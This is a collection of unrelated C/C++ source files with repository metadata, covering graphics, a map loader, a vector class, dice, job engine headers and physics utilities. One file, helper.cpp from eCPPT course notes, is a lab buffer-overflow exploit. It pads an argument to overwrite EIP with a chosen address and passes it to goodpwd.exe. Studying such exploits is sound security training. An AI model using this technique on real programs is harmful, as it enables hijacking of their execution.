getchar();
for(a = 1; a <= n; a++){
for(c = 0; c < 30; c++)
ara[c] = 0;
for(c = 0; c < 6; c++)
ara2[c] = 0;
gets(str);
l = strlen(str);
for(i = 0; i < l; i++){
b = str[i] - 64;
ara[b]++;
}
ara2[0] = ara[1]/3;
ara2[1] = ara[7];
ara2[2] = ara[9];
ara2[3] = ara[13];
ara2[4] = ara[18] / 2;
ara2[5] = ara[20];
sort(ara2, ara2 + 6);
printf("%d\n",ara2[0]);
}
return 0;
}
|
a02da836fdebc6067e526e5e33d43c8c840906f7
|
53bc5676710f6fd4e3c8b02a532065f6bc518063
|
/object/Plane.h
|
94ec3cfb1b8766c898c7a8ad92b276cf9f3de309
|
[] |
no_license
|
kevinandrianliu/IF-3260-UAS-Grafkom
|
e8c9aeba35902a48e48c0f72d4f1e1dd9e3fcb89
|
9a997a48deffab48da4c75474edc2fc5c33a1106
|
refs/heads/master
| 2023-03-02T21:50:05.793499
| 2019-02-27T00:29:18
| 2019-02-27T00:29:18
| 338,602,821
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 929
|
h
|
Plane.h
|
#ifndef __PLANE_HPP__
#define __PLANE_HPP__
#include "../util/class_util.h"
#include "../util/func_util.h"
using namespace std;
class Plane : public Renderable {
public:
Plane(int x, int y, int offset_x, int offset_y);
virtual ~Plane();
int getOffsetX();
void setOffsetX(int offset_x);
int getOffsetY();
void setOffsetY(int offset_y);
void move(struct fb_var_screeninfo vinfo);
void moveUp(struct fb_var_screeninfo vinfo);
void moveDown(struct fb_var_screeninfo vinfo);
void render(char* fbp, struct fb_var_screeninfo vinfo, struct fb_fix_screeninfo finfo);
private:
int offset_x;
int offset_y;
char way;
};
class PlanePiece : public Plane {
public:
PlanePiece(int x, int y, int offset_x, int offset_y);
~PlanePiece();
void render(char* fbp, struct fb_var_screeninfo vinfo, struct fb_fix_screeninfo finfo);
};
#endif
|
d794718c0f68b3e0c43e80bcba042b1eac7b1b01
|
bec2cfc742596ad8f71e4fc8ca55d88fbb76860c
|
/ECPPT/system-security/3_Buffer_Overflow/helper.cpp
|
34516b8d71e045586485cfb541ba00c23dbf99f6
|
[] |
no_license
|
zer0byte/ecppt-notes
|
f8cc3e095104fdfb4adea3a88c08d08565073916
|
1592af3aff67aca169dd564d1b987a06cf56c941
|
refs/heads/master
| 2020-05-01T07:34:43.673723
| 2018-12-22T16:46:21
| 2018-12-22T16:46:21
| 177,354,511
| 22
| 12
| null | 2019-03-24T00:35:40
| 2019-03-24T00:35:40
| null |
UTF-8
|
C++
| false
| false
| 604
|
cpp
|
helper.cpp
|
#include <iostream>
#include <cstring>
int main(int argc, char *argv[])
{
char command[256];
char parameter[128];
memset(parameter,0x41,22); // fill the parameter with 'A' character
// now modify the location which overwrites the EIP
parameter[22]= 0x48;
parameter[23]= 0x15;
parameter[24]= 0x40;
parameter[25]= 0x00;
parameter[26] = 0 ; /* null terminate the parameter so as previous frames are not overwritten */
strcpy(command , "goodpwd.exe ");
strcat(command, parameter);
printf("%s\n",command);
system(command); /* execute the command */
return 0;
}
|
fc4bf32e1603793b9315890d96515d312907ec45
|
1ec6f38d64dc665e615f0bdc54a14f32f1e372e3
|
/tmp/Examples.cpp
|
e5ae2b9b4217467117a932f848099f9509d50a1d
|
[] |
no_license
|
victor-axelsson/ID2204
|
960c314cb784c6259b2d5d3f6c8b5de33f94af58
|
25b2a6a8a04df44f6e014cb46482b348e354a513
|
refs/heads/master
| 2021-01-18T23:13:51.168251
| 2017-05-26T13:55:02
| 2017-05-26T13:55:02
| 87,098,989
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 740
|
cpp
|
Examples.cpp
|
// Created by Victor Axelsson on 2017-04-03.
// Copyright © 2017 simple_solutions. All rights reserved.
//
#include <stdio.h>
#include <string>
using namespace std;
static int fabric_examples[][2] = {
{10, 20},
{22, 20},
{100, 100},
{120, 100},
{50, 20},
{44, 101},
{5, 5},
{100, 68},
{22, 20},
{100, 100},
{20, 20},
{22, 66},
{10, 20}
};
static int fabric_examples_widths[] = {33,46,25,46,76,55,93,35,23,12,101,89,16,103,23,15,31,78,107,51,59,89,25,70,11,34};
static int fabric_examples_heights[] = {46,25,46,76,55,93,35,23,12,101,89,16,103,23,15,31,78,107,51,59,89,25,70,11,34,33};
static string colors[] = {"red", "green", "silver", "blue", "yellow", "brown", "gray", "white"};
|
9d0c88e105f7eaa1005dd58b20611ddf3de067a4
|
2a83b4a5b6c48ddf685057a9c2c5e7f2040ba705
|
/client/Source/Map.cpp
|
bcb32688c547ec3d365605e64ac848fb2e0c932c
|
[] |
no_license
|
roneiberlezi/one-real
|
6c7dee2cd30b531dfc4480a63db6785592258863
|
e4e7ef17fac4ef858ddf68ee568b01bd6247017d
|
refs/heads/master
| 2021-05-08T03:49:51.391577
| 2017-10-26T23:09:25
| 2017-10-26T23:09:25
| 108,337,982
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 5,147
|
cpp
|
Map.cpp
|
//
// Map.cpp
// GP
//
// Created by Ronei Berlezi on 07/10/14.
// Copyright (c) 2014 Ronei Berlezi. All rights reserved.
//
#include "Map.h"
Map::Map(const char* fileName, int tileWidth, int tileHeight, int screenWidth, int screenHeight)
{
this->screenWidth = screenWidth;
this->screenHeight = screenHeight;
file = SDL_RWFromFile(fileName, "r+b" );
//File does not exist
if( file == NULL )
{
printf( "Warning: Unable to open file! SDL Error: %s\n", SDL_GetError() );
fileNotFound = true;
}
//File exists
else
{
fileNotFound = false;
//Load data
printf( "Reading file...!\n" );
SDL_RWread( file, &sizeX, sizeof(int), 1);
SDL_RWread( file, &sizeY, sizeof(int), 1);
SDL_RWread( file, &tileSetNumber, sizeof(int), 1);
this->layerAmount = 3;
area.w = sizeX*tileWidth;
area.h = sizeY*tileHeight;
area.x = 0;
area.y = 0;
this->tileWidth = tileWidth;
this->tileHeight = tileHeight;
for (int a = 0; a < layerAmount; a++)
layer.push_back(new Layer(sizeX, sizeY));
for( int x = 0; x < sizeX; x++ )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWread( file, &layer[0]->layer[x][y], sizeof(int), 1 );
}
}
for( int x = 0; x < sizeX; x++ )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWread( file, &layer[1]->layer[x][y], sizeof(int), 1 );
}
}
for( int x = 0; x < sizeX; x++ )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWread( file, &layer[2]->layer[x][y], sizeof(int), 1 );
}
}
//Close file handler
SDL_RWclose( file );
currentTileSet = new TileSet(tileWidth, tileHeight, tileSetNumber);
miniMap = new MiniMap(tileWidth, tileHeight, screenWidth, screenHeight);
miniMap->setMapSize(sizeX, sizeY);
}
}
void Map::drawMap(SDL_Surface* screen, int width, int height, SDL_Point cameraPosition){
int spareX = cameraPosition.x%tileWidth;
int spareY = cameraPosition.y%tileHeight;
cameraPosition.x = cameraPosition.x/tileWidth;
cameraPosition.y = cameraPosition.y/tileHeight;
SDL_Rect dst;
for (std::vector<Layer*>::iterator it = layer.begin(); it != layer.end(); ++it){
dst.x = 0;
dst.y = 0;
for (int x = cameraPosition.x, dX = 0; x < sizeX && dst.x < width - tileWidth - 1; x++, dX++){
for (int y = cameraPosition.y, dY = 0; y < sizeY && dst.y < height - tileHeight - 1; y++, dY++){
dst.x = dX * tileWidth - spareX;
dst.y = dY * tileHeight - spareY;
if ((*it)->layer[x][y] != 0)
SDL_BlitSurface(currentTileSet->tiles[(*it)->layer[x][y]]->tile
, NULL
, screen
, &dst);
}
dst.y = 0;
}
}
miniMap->draw(screen, cameraPosition.x, cameraPosition.y);
}
void Map::drawLayer(SDL_Surface* screen, int layer_, std::vector<Tile*> tileSet, int width, int height, int posx, int posy){
SDL_Rect dst;
dst.x = 0 * tileWidth;
dst.y = 0 * tileHeight;
for (int x = posx; x < sizeX && dst.x < width-33; x++){
for (int y = posy; y < sizeY && dst.y < height; y++){
dst.x = (x) * tileWidth;
dst.y = (y) * tileHeight;
SDL_BlitSurface(tileSet[layer[(layer_ - 1)]->layer[x][y]]->tile
, NULL
, screen
, &dst);
}
dst.y = 0;
}
}
bool Map::save(const char* fileName){
bool success = true;
//Open data for writing
file = SDL_RWFromFile(fileName, "w+b" );
if( file != NULL )
{
//Save sizeX and sizeY
SDL_RWwrite( file, &sizeX, sizeof(int), 1 );
SDL_RWwrite( file, &sizeY, sizeof(int), 1 );
SDL_RWwrite( file, &tileSetNumber, sizeof(int), 1 );
//Save data
for( int x = 0; x < sizeX; ++x )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWwrite( file, &layer[0]->layer[x][y], sizeof(int), 1 );
}
}
for( int x = 0; x < sizeX; ++x )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWwrite( file, &layer[1]->layer[x][y], sizeof(int), 1 );
}
}
for( int x = 0; x < sizeX; ++x )
{
for (int y = 0; y < sizeY; y++) {
SDL_RWwrite( file, &layer[2]->layer[x][y], sizeof(int), 1 );
}
}
//Close file handler
SDL_RWclose( file );
}
else
{
printf( "Error: Unable to save file! %s\n", SDL_GetError() );
}
return success;
}
Map::~Map()
{
for (std::vector<Layer*>::iterator it = layer.begin(); it != layer.end(); ++it)
(*it)->~Layer();
}
|
fa662e88dc9b065af26c7f036f4647da1490ad3f
|
c20b459468fa359a6f4c545db72a211d38298909
|
/source/bits/toBinary.cpp
|
4508a8de64647c65adefc04b61b8ac1dd3da00ea
|
[] |
no_license
|
mycppfeed/Leetmap
|
e0340c6ecb85901c9555900a871e159a16940028
|
f1f31085de60adce9dabe5eb2e5c4d66a5ba1572
|
refs/heads/master
| 2021-11-04T00:13:19.882064
| 2019-04-26T21:18:30
| 2019-04-26T21:18:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 919
|
cpp
|
toBinary.cpp
|
#include<iostream>
#include<cstring>
int my_atoi(char* str) {
int len = 0;
char* temp = str;
while(*temp != '\0') {
len ++;
temp ++;
}
int res =0;
int p =1;
for(int i = len - 1 ; i >=0 ; i -- ) {
int C = str[i] - '0';
res = res + p*C;
p = p*10;
}
return res;
}
void toBinary(int I) {
int size = 8*sizeof(int);
char arr[size];
memset(arr,0,size );
int index = size -1;
if(I < 0) {
arr[0] = 1 ;
unsigned int u = 2147483648;
I = u + I;
}
for(;(I!=0) && (index >= 1); index --) {
int q = I /2;
int r = I %2;
arr[index] = r;
I = q;
}
for(int i=0; i < size; i++) {
std::cout << int(arr[i]) << " ";
}
std::cout <<std::endl;
}
int main(int argc, char** argv) {
int I = my_atoi(argv[1]);
std::cout << "The binary format of " << I << " : (sizeof int) : " << sizeof(int) << std::endl;
toBinary(I);
return 0;
}
|
20e90221eec4d5e689cd507f7fec5fc306668357
|
a1f90d6981651cfcd2f69424a6a92247f9cadd37
|
/Chapter 13/Die.cpp
|
4a51f04010bfc7aa000d3d778e4f635a2acb171d
|
[] |
no_license
|
zanariah8/Programming_Assignments
|
0f96002511bfea1ccf05f079188e5f78ca6cf197
|
a3c3014d5a7e6e4f99b355789576b58233518611
|
refs/heads/master
| 2020-04-23T20:38:26.299353
| 2018-03-07T01:20:07
| 2018-03-07T01:20:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 690
|
cpp
|
Die.cpp
|
#include <iostream>
#include "Die.h"
using namespace std;
int main(int argc, char *argv[])
{
const int DIE1_SIDES = 6;
const int DIE2_SIDES = 12;
const int MAX_ROLLS = 5;
Die die1(DIE1_SIDES);
Die die2(DIE2_SIDES);
cout << "This simulates the rolling of a " << die1.getSides() << " sided die and a ";
cout << die2.getSides() << " sided die." << endl;
cout << "Initial value of the dice:\n";
cout << die1.getValue() << " " << die2.getValue() << endl;
cout << "Rolling the dice " << MAX_ROLLS << " times.\n";
for (int count = 0; count < MAX_ROLLS; count++)
{
die1.roll();
die2.roll();
cout << die1.getValue() << " " << die2.getValue() << endl;
}
return 0;
}
|
4c94e7f08887e96be2ef649c4d482d5a8e1ca5fe
|
0a4ea172e919dccd24c82bb4d79750858d18951f
|
/include/QPVector.hpp
|
32e996307d741ad2364d336ff434f3d739c15d2f
|
[
"BSD-3-Clause"
] |
permissive
|
Isaac-Kwon/qupid
|
5aa94f87fce58957ea660b2816d590af76674e0e
|
5fead0708a546c2da8a0f7fccf70183d91c9237b
|
refs/heads/master
| 2023-04-18T06:51:41.969544
| 2022-09-07T01:33:25
| 2022-09-07T01:33:25
| 337,677,732
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 4,534
|
hpp
|
QPVector.hpp
|
#ifndef __QPVECTOR__
#define __QPVECTOR__ 1
#include "string"
#include "iostream"
class QPVector{
public:
QPVector();
QPVector(double x, double y);
QPVector(double x, double y, double z);
QPVector(const QPVector& other);
//Get
double X();
double Y();
double Z();
void Get(double& x, double& y, double& z);
QPVector Unit();
//Operator, returning result
inline double Dot(QPVector other) const;
inline QPVector Cross(QPVector other) const;
QPVector Scale(double& number);
double Norm();
double Norm2();
//Operator, Self operation
void AddThis(const QPVector& other);
void SubstractThis(const QPVector& other);
void CrossThis(const QPVector& other);
void ScaleThis(const double& number);
//Operator, Coveniences
// QPVector& operator+(const QPVector& other); //Add
// QPVector& operator-(const QPVector& other); //Substract
// double operator*(const QPVector& other); //Dot product
// QPVector& operator*(const double& other); //Scaling
// QPVector& operator^(const QPVector& other); //Cross product
inline QPVector & operator=(const QPVector& other);
friend QPVector operator+(QPVector& a, QPVector& b);
friend QPVector operator+(QPVector a, QPVector b);
// friend QPVector operator-(QPVector& a, QPVector& b);
friend QPVector operator-(QPVector a, QPVector b);
// friend QPVector operator^(QPVector& a, QPVector& b);
friend QPVector operator^(QPVector a, QPVector b);
// friend QPVector operator* (QPVector &vec, double other);
// friend QPVector operator* (double other, QPVector& vec);
friend QPVector operator* (QPVector vec, double other);
friend QPVector operator* (double other, QPVector vec);
// friend double operator* (QPVector& other, QPVector& vec);
friend double operator* (QPVector other, QPVector vec);
inline QPVector& operator+=(const QPVector& other); //Add
inline QPVector& operator-=(const QPVector& other); //Substract
inline QPVector& operator*=(const double& other); //Scaling
inline QPVector& operator^=(const QPVector& other); //Cross product
inline double& operator()(const int& i);
inline double& operator[](const int& i);
double GetAngle(QPVector other);
double GetAngleDegree(QPVector other);
std::string Print(bool quite=false);
protected:
private:
double fX=0., fY=0., fZ=0;
};
inline QPVector& QPVector::operator=(const QPVector& other){
fX = other.fX;
fY = other.fY;
fZ = other.fZ;
return *this;
}
inline QPVector& QPVector::operator+=(const QPVector& other){
fX += other.fX;
fY += other.fY;
fZ += other.fX;
return (*this);
}
inline QPVector& QPVector::operator-=(const QPVector& other){
fX -= other.fX;
fY -= other.fY;
fZ -= other.fX;
return (*this);
}
inline QPVector& QPVector::operator*=(const double& other){
fX *= other;
fY *= other;
fZ *= other;
return (*this);
}
inline QPVector& QPVector::operator^=(const QPVector& other){
fX = fY*other.fZ-fY*other.fZ;
fY = fZ*other.fX-fX*other.fZ;
fZ = fX*other.fY-fY*other.fX;
return (*this);
}
inline double& QPVector::operator()(const int& i){
if(i>2) std::cout<<"QPVector::operator() - Index is over 3\t:\t" << i <<std::endl;
double * val[3] = {&fX, &fY, &fZ};
return *(val[i]);
}
inline double& QPVector::operator[](const int& i){
if(i>2) std::cout<<"QPVector::operator[] - Index is over 3\t:\t" << i <<std::endl;
double * val[3] = {&fX, &fY, &fZ};
return *(val[i]);
}
inline double QPVector::Dot(QPVector other) const{
return fX*other.fX + fY*other.fY + fZ*other.fZ;
}
inline QPVector QPVector::Cross(QPVector other) const{
return QPVector(fY*other.fZ-other.fY*fZ, fZ*other.fX-other.fZ*fX, fX*other.fY-other.fX*fY);
}
// QPVector operator+ ( QPVector &, QPVector & );
QPVector operator+ ( QPVector , QPVector );
// QPVector operator- ( QPVector &, QPVector & );
QPVector operator- ( QPVector , QPVector );
// QPVector operator^ ( QPVector &, QPVector & );
QPVector operator^ ( QPVector , QPVector );
// QPVector operator* ( QPVector & , double a );
// QPVector operator* ( double a , QPVector & );
// double operator* ( QPVector & , QPVector & );
QPVector operator* ( QPVector , double a );
QPVector operator* ( double a , QPVector );
double operator* ( QPVector , QPVector );
#endif
|
c7193deaac384ee3f6b64795d87d9a9fc65028ef
|
09ae288c5dc5cc92b2e69ec54f9d01c107eeefc5
|
/src/displays/DisplayDriver.h
|
7ada06179cf23a9c7391c7d9fef40fdd70d67d14
|
[] |
no_license
|
TheJeterLP/CarDisplay
|
074c54a18334f77e09d5d4e1ff1812cba7c06a4e
|
edb87d5f18c222843dff79ef6dc0ec9610dcadae
|
refs/heads/master
| 2023-06-08T08:58:06.245761
| 2021-06-22T17:41:24
| 2021-06-22T17:41:24
| 324,166,140
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 215
|
h
|
DisplayDriver.h
|
#ifndef DISPLAY_DRIVER
#define DISPLAY_DRIVER
class DisplayDriver
{
public:
virtual void setupDisplay() = 0;
virtual void loopDisplay() = 0;
virtual void onTouch() = 0;
private:
protected:
};
#endif
|
c43ea3ce37a99cca90c45796f9f170eedb546d62
|
2bae07914bcd383fefe415194ffb63e2b007aff2
|
/engine/modules/runtime/graphics_resources/include/tiki/graphics/shader_set.hpp
|
7ca04a283b061bb782d4bfe1e74d05fb2eaeceee
|
[] |
no_license
|
TikiTek/mechanica
|
ec4972b541bfb7dc685b0b7918785c5ca99622d2
|
d151a818a279f1969b977ff7a935148b18ab9546
|
refs/heads/master
| 2021-10-09T07:27:23.308704
| 2021-10-08T07:42:04
| 2021-10-08T07:42:04
| 71,704,579
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 986
|
hpp
|
shader_set.hpp
|
#pragma once
#include "tiki/base/types.hpp"
#include "tiki/container/sorted_sized_map.hpp"
#include "tiki/graphics/shader_type.hpp"
#include "tiki/resource/resource.hpp"
namespace tiki
{
class GraphicsSystem;
class Shader;
class ShaderSet : public Resource
{
TIKI_DEFINE_RESOURCE( ShaderSet, TIKI_FOURCC( 'T', 'G', 'S', 'S' ) );
public:
static void registerResourceType( ResourceManager& resourceManager, GraphicsSystem& graphicsSystem );
static void unregisterResourceType( ResourceManager& resourceManager );
const Shader* getShader( ShaderType type, crc32 variantKey ) const;
protected:
virtual bool createInternal( const ResourceInitData& initData, const FactoryContext& factoryContext );
virtual void disposeInternal( const FactoryContext& factoryContext );
private:
ShaderSet();
virtual ~ShaderSet();
Array< Shader > m_shaders;
SortedSizedMap< crc32, const Shader* > m_shaderMap;
};
}
|
5961d2032a9c976ad029a2b99b5b22689e507d9e
|
7be8e3636bf08ebdc6662879dc5afec548705537
|
/ios/Pods/Flipper-RSocket/rsocket/benchmarks/Latch.h
|
fc5422169ded104a5031c3f5e4c4425f05bb5d1e
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] |
permissive
|
rdhox/react-native-smooth-picker
|
3c7384f1fed0e37f076361cce96071d01b70e209
|
ae9316c49512f7ed9824c5a3ad50cdf5e80fffa9
|
refs/heads/master
| 2023-01-08T16:59:40.709147
| 2021-07-03T14:13:21
| 2021-07-03T14:13:21
| 160,224,312
| 230
| 31
|
MIT
| 2023-01-06T01:46:04
| 2018-12-03T16:54:10
|
TypeScript
|
UTF-8
|
C++
| false
| false
| 1,173
|
h
|
Latch.h
|
// Copyright (c) Facebook, Inc. and its affiliates.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#pragma once
#include <folly/synchronization/Baton.h>
/// Simple implementation of a latch synchronization primitive, for testing.
class Latch {
public:
explicit Latch(size_t limit) : limit_{limit} {}
void wait() {
baton_.wait();
}
bool timed_wait(std::chrono::milliseconds timeout) {
return baton_.timed_wait(timeout);
}
void post() {
auto const old = count_.fetch_add(1);
if (old == limit_ - 1) {
baton_.post();
}
}
private:
folly::Baton<> baton_;
std::atomic<size_t> count_{0};
const size_t limit_{0};
};
|
412b4ad9ac63c04c51bf25662401f68a284ab212
|
30cb51da30f3b070c2433b2a411ca26d63e5a8f6
|
/source/jobs/JobEngine.h
|
40eec84035141508cea986a4486428f3ee462450
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
doronbl/aws-iot-device-client
|
b8a5e70895a373b367b11ab5c6707554ae049b10
|
620aec60f5a625d00194e4f3f770b6fcc59c98f3
|
refs/heads/main
| 2023-05-01T02:16:10.385485
| 2021-04-27T18:56:41
| 2021-04-27T18:56:41
| 357,313,157
| 0
| 0
|
Apache-2.0
| 2021-04-12T19:20:54
| 2021-04-12T19:20:53
| null |
UTF-8
|
C++
| false
| false
| 5,684
|
h
|
JobEngine.h
|
// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
#ifndef DEVICE_CLIENT_JOBENGINE_H
#define DEVICE_CLIENT_JOBENGINE_H
#include <atomic>
#include <condition_variable>
#include <memory>
#include <sstream>
#include <string>
#include <vector>
#include "LimitedStreamBuffer.h"
namespace Aws
{
namespace Iot
{
namespace DeviceClient
{
namespace Jobs
{
/**
* \brief Manages the execution of a Job
*
* The JobEngine is fully responsible for executing a given command and its arguments, which may
* point to handlers provided as part of the Device Client or to other executables available to
* the device. The JobEngine manages all of the setup required to redirect output from the child
* process so that it can be analyzed by the Jobs feature and used to determine job success.
*/
class JobEngine
{
private:
const char *TAG = "JobEngine.cpp";
/**
* \brief The maximum number of lines that we'll read from STDOUT or STDERR of the child process
* before stopping. This prevents against log corruption in the event that the specified
* job generates a large volume of output
*/
static constexpr size_t MAX_LOG_LINES = 1000;
/**
* \brief The number of lines received on STDERR from the child process
*
* Used to determine whether the job was successful or not, since a script
* with multiple commands will return the return code of the final command
* and may not be indicative of whether all actions were successful. The incoming
* job document may include a property that specifies an acceptable number of
* STDERR lines to allow in case some errors are expected.
*/
std::atomic_int errors{0};
/**
* \brief Partial output from STDOUT of the child process to be used in UpdateJobExecution
*/
Aws::Iot::DeviceClient::Jobs::LimitedStreamBuffer stdoutstream;
/**
* \brief Partial output from STDERR of the child process to be used in UpdateJobExecution
*/
Aws::Iot::DeviceClient::Jobs::LimitedStreamBuffer stderrstream;
public:
/**
* \brief Used by output processing threads to assess output from the child process
*
* @param fd the file descriptor of the output to process
* @param isStdErr whether the output being processed is from STDERR
* @param childPID the process ID of the child process
*/
void processCmdOutput(int fd, bool isStdErr, int childPID);
/**
* \brief Executes the given command (action) and passes the provided vector of arguments to that
* command
* @param action the command to execute
* @param args the arguments to pass to that command
* @return an integer representing the return code of the executed process
*/
int exec_cmd(std::string action, std::vector<std::string> args);
/**
* \brief Begin the execution of a command with the specified arguments
*
* @param operation the operation to perform, likely the path to an executable
* @param args the arguments to pass to the executable
* @return the return code of the child process, or an error code if it cannot be executed
*/
/**
* \brief Whether the JobEngine is reporting errors received from the child process
*
* @return an integer representing the number of lines received on STDERR
*/
int hasErrors() { return errors; }
/**
* \brief Evaluates the return code of the JobEngine's command execution
* @param statusCode the status code returned by the job execution
* @return the output of the status code evaluation
*/
std::string getReason(int statusCode);
/**
* \brief Take the STDOUT received from the child process
*
* @return a LimitedStreamBuffer taken from the JobEngine
*/
std::string getStdOut() { return stdoutstream.toString(); };
/**
* \brief Take the STDERR received from the child process
*
* @return a LimitedStreamBuffer taken from the JobEngine
*/
std::string getStdErr() { return stderrstream.toString(); };
};
} // namespace Jobs
} // namespace DeviceClient
} // namespace Iot
} // namespace Aws
#endif // DEVICE_CLIENT_JOBENGINE_H
|
9c257cc4a4f8fc11e5e84edf305374886f90cea5
|
59ea9c316c6de13926067952e7ded03b5f81205f
|
/generator/riichi/rchmcevent.hpp
|
1081f86c138ba59ffa20c7e149553cf1944afe9e
|
[] |
no_license
|
federicotyx/mcmahjong
|
7a9ee34f870b866d3048de3269824cb73dd4a8ed
|
c606f2255719ed217f6084039825a90fd6653d18
|
refs/heads/master
| 2021-01-10T12:13:39.036994
| 2015-10-13T03:57:57
| 2015-10-13T03:57:57
| 43,807,335
| 4
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 723
|
hpp
|
rchmcevent.hpp
|
#ifndef MCMJ_RCHMC_RCHMCEVENT_HPP
#define MCMJ_RCHMC_RCHMCEVENT_HPP 11
#include <vector>
#include <cstdint>
#include <iostream>
#include "ps.hpp"
class rchmcevent
{
public:
rchmcevent();
void init(ps& aps);
void draw(ps& aps);
void remove(int8_t a);
int8_t* sp() { return _sp; }
const int8_t* sp() const { return _sp; }
void set_status(uint8_t s) { _status = s; }
void write_binary(std::ostream& os);
void read_binary(std::istream& is);
void write_simple(std::ostream& os);
void write_human(std::ostream& os);
protected:
void conv34to13(int8_t a[34], int8_t b[13]);
void conv13to34(int8_t a[13], int8_t b[34]);
int8_t _status;
int8_t _sp[34];
int8_t _isp[34];
std::vector<int8_t> _vps;
};
#endif
|
831bec1dc4a3a2e8ab773e490e9c824ff335b42a
|
c793485c320996688d726e1e4d67dca9b47dca17
|
/src/Utils.h
|
6512aacf791fed51536ac9d42c71e1206e96caee
|
[] |
no_license
|
HAWinther/AST5220-Cosmology
|
c49ae257331e6b5b866f52eb98ddbdb640f845e4
|
a6b9bd6e4df1b57143237d3b05d76d080857a300
|
refs/heads/master
| 2023-02-16T04:11:10.458712
| 2023-02-11T21:59:05
| 2023-02-11T21:59:05
| 237,037,709
| 8
| 5
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 5,462
|
h
|
Utils.h
|
#ifndef _UTILS_HEADER
#define _UTILS_HEADER
#include <vector>
#include <cmath>
#include <iostream>
#include <algorithm>
#include <chrono>
#include <map>
#include <gsl/gsl_sf_bessel.h>
#ifdef _COMPLEX_BESSEL
#include <complex_bessel.h>
#endif
#include "Spline.h"
#include "ODESolver.h"
// The constants used in this code. Everything is here in SI units
extern struct ConstantsAndUnits {
// Basic units (here we use SI)
const double m = 1.0; // Length (in meters)
const double s = 1.0; // Time (in seconds)
const double kg = 1.0; // Kilo (in kilos)
const double K = 1.0; // Temperature (in Kelvins)
// Derived units
const double km = 1e3 * m; // Kilometers
const double N = kg*m/(s*s); // Newton
const double J = N*m; // Joule
const double W = J/s; // Watt
const double Mpc = 3.08567758e22 * m; // Megaparsec
const double eV = 1.60217653e-19 * J; // Electronvolt
// Physical constants
const double k_b = 1.38064852e-23 * J/K; // Bolzmanns constant
const double m_e = 9.10938356e-31 * kg; // Mass of electron
const double m_H = 1.6735575e-27 * kg; // Mass of hydrogen atom
const double c = 2.99792458e8 * m/s; // Speed of light
const double G = 6.67430e-11 * N*m*m/(kg*kg); // Gravitational constant
const double hbar = 1.054571817e-34 * J*s; // Reduced Plancks constant
const double sigma_T = 6.6524587158e-29 * m*m; // Thomas scattering cross-section
const double lambda_2s1s = 8.227 / s; // Transition time between 2s and 1s in Hydrogen
const double H0_over_h = 100 * km/s/Mpc; // H0 / h
const double epsilon_0 = 13.605693122994 * eV; // Ionization energy for the ground state of hydrogen
const double xhi0 = 24.587387 * eV; // Ionization energy for neutral Helium
const double xhi1 = 4.0 * epsilon_0; // Ionization energy for singly ionized Helium
// Min and max k-value
const double k_min = 0.00005 / Mpc;
const double k_max = 0.3 / Mpc;
// Min and max x-value
const double x_start = log(1e-8);
const double x_end = 0.0;
// Include polarization and/or neutrinos?
const bool polarization = true;
const bool neutrinos = true;
// For integration of perturbations (number of equations and positions in arrays)
const int n_scalars = 5;
const int n_ell_theta = 8;
const int n_ell_thetap = 8 * polarization;
const int n_ell_neutrinos = 8 * neutrinos;
const int n_ell_tot_full = n_scalars + n_ell_theta + n_ell_thetap + n_ell_neutrinos;
const int ind_deltacdm = 0;
const int ind_deltab = 1;
const int ind_vcdm = 2;
const int ind_vb = 3;
const int ind_Phi = 4;
const int ind_start_theta = n_scalars;
const int ind_start_thetap = ind_start_theta + n_ell_theta;
const int ind_start_nu = ind_start_thetap + n_ell_thetap;
// For integration of perturbations in tight coupling regime (Only 2 photon multipoles + neutrinos needed)
const int n_scalars_tc = 5;
const int n_ell_theta_tc = 2;
const int n_ell_thetap_tc = 0;
const int n_ell_neutrinos_tc = n_ell_neutrinos;
const int n_ell_tot_tc = n_scalars_tc + n_ell_theta_tc + n_ell_thetap_tc + n_ell_neutrinos;
const int ind_deltacdm_tc = 0;
const int ind_deltab_tc = 1;
const int ind_vcdm_tc = 2;
const int ind_vb_tc = 3;
const int ind_Phi_tc = 4;
const int ind_start_theta_tc = n_scalars_tc;
const int ind_start_thetap_tc = ind_start_theta_tc + n_ell_theta_tc;
const int ind_start_nu_tc = ind_start_thetap_tc + n_ell_thetap_tc;
} Constants;
namespace Utils {
// Find the x-value such that y(x) = y_value
double binary_search_for_value(
const Spline &y,
double y_value,
std::pair<double,double> xrange = {0.0,0.0},
double epsilon = 1e-7);
// Ordinary bessel functions
double J_n(const int n, const double x);
// Spherical bessel functions
double j_ell(const int ell, const double x);
std::vector<double> j_ell_array(const int lmax, const double x);
// Generate an array with n equispaced points from xmin to xmax
std::vector<double> linspace(double xmin, double xmax, int num);
// Take the derivative of a function (simple 2pt stencil)
std::vector<double> derivative(std::vector<double> &x, std::vector<double> &f);
// For timing
void StartTiming(std::string &name);
void EndTiming(std::string &name);
void StartTiming(const char *name);
void EndTiming(const char *name);
std::chrono::time_point<std::chrono::steady_clock> getTime();
double timeInSeconds(
std::chrono::time_point<std::chrono::steady_clock> & time_start,
std::chrono::time_point<std::chrono::steady_clock> & time_end);
}
// Macro to be able to take usual math functions of a whole vector
